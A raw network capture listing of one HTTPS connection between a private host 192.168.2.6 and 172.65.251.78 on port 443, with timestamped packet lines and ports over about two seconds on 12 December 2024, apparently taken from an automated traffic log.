Dec 12, 2024 13:05:19.911688089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.911731005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.919207096 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.919225931 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.919322968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.919329882 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.919375896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.926894903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.926930904 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.926970959 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.926983118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.927047968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.927047968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.933736086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.933754921 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.933855057 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.933862925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.937674999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.941414118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.941431046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.941518068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.941523075 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.941576958 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.948451042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.948470116 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.948558092 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.948561907 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.948605061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.956098080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.956134081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.956198931 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.956212044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.956257105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.963852882 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.963876963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.963973045 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:19.963980913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:19.965329885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.103416920 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.103444099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.103600025 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.103614092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.103652954 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.112689018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.112709045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.112809896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.112819910 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.112845898 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.112859964 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.118736982 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.118757010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.118844032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.118850946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.118889093 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.125581026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.125603914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.125663042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.125674963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.125716925 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.135154963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.135178089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.135267019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.135277987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.135332108 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.142178059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.142199993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.142277002 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.142287016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.142332077 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.148878098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.148901939 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.148960114 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.148971081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.149013042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.156955957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.156974077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.157056093 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.157062054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.157095909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.296056032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.296097994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.296139002 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.296153069 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.296176910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.296199083 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.303900003 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.303919077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.303992987 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.303997993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.304110050 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.311223984 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.311239958 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.311288118 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.311291933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.311367035 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.318487883 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.318501949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.318598032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.318603992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.318710089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.325432062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.325448036 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.325501919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.325506926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.329041004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.332756996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.332771063 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.332850933 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.332854033 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.335833073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.340367079 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.340382099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.340461016 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.340465069 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.340498924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.348105907 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.348125935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.348196030 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.348200083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.348243952 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.511003971 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.511038065 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.511082888 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.511094093 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.511152029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.517059088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.517076015 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.517147064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.517153025 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.517199039 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.524720907 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.524743080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.524799109 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.524806023 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.524849892 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.532241106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.532260895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.532327890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.532335043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.532380104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.538923979 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.538940907 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.539005995 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.539011955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.539050102 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.547162056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.547182083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.547256947 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.547264099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.547301054 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.553874016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.553915024 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.553956985 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.553970098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.554002047 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.554018021 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.561717987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.561734915 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.561800003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.561804056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.561930895 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.701663971 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.701685905 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.701767921 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.701787949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.701872110 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.709307909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.709326029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.709399939 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.709403992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.709453106 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.716922045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.716943979 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.717005968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.717016935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.717076063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.724693060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.724714994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.724787951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.724798918 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.724839926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.731420994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.731437922 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.731507063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.731513977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.731559038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.738552094 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.738571882 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.738667011 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.738675117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.738787889 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.746264935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.746285915 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.746339083 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.746344090 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.746398926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.753930092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.753950119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.754013062 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.754018068 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.754057884 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.894623041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.894659996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.894716978 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.894728899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.894767046 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.894777060 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.900700092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.900732994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.900772095 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.900779963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.900821924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.900837898 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.908396006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.908422947 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.908468962 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.908478975 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.908520937 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.916009903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.916038036 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.916106939 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.916115046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.916187048 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.923816919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.923839092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.923907042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.923918009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.923986912 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.930991888 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.931013107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.931086063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.931096077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.931138039 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.938888073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.938905954 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.938971996 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.938978910 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.939013004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.945436954 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.945452929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.945564032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:20.945569038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:20.945616007 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.085809946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.085843086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.085902929 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.085915089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.085959911 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.093543053 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.093559980 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.093626022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.093631029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.093767881 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.101296902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.101310968 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.101377964 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.101385117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.101546049 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.107933044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.107949018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.108019114 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.108022928 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.108135939 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.115556002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.115572929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.115675926 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.115681887 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.115719080 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.122747898 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.122766018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.122868061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.122870922 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.122912884 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.130572081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.130589962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.130681038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.130683899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.130726099 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.138226986 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.138245106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.138324022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.138328075 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.138370037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.278889894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.278920889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.279001951 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.279014111 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.279057980 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.285856962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.285875082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.285957098 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.285960913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.286060095 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.293289900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.293307066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.293387890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.293392897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.293457985 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.300885916 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.300903082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.300980091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.300983906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.301023960 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.308737993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.308753967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.308820963 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.308825016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.309376955 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.316226006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.316242933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.316320896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.316324949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.316582918 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.322581053 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.322601080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.322664022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.322673082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.322870970 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.330409050 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.330432892 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.330504894 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.330512047 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.330545902 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.470556974 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.470578909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.470674038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.470685005 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.470736980 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.478194952 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.478209019 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.478322029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.478326082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.478380919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.485810041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.485835075 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.485912085 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.485923052 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.485959053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:21.493607998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:21.493643999 CET	443	49726	172.65.251.78	192.168.2.6
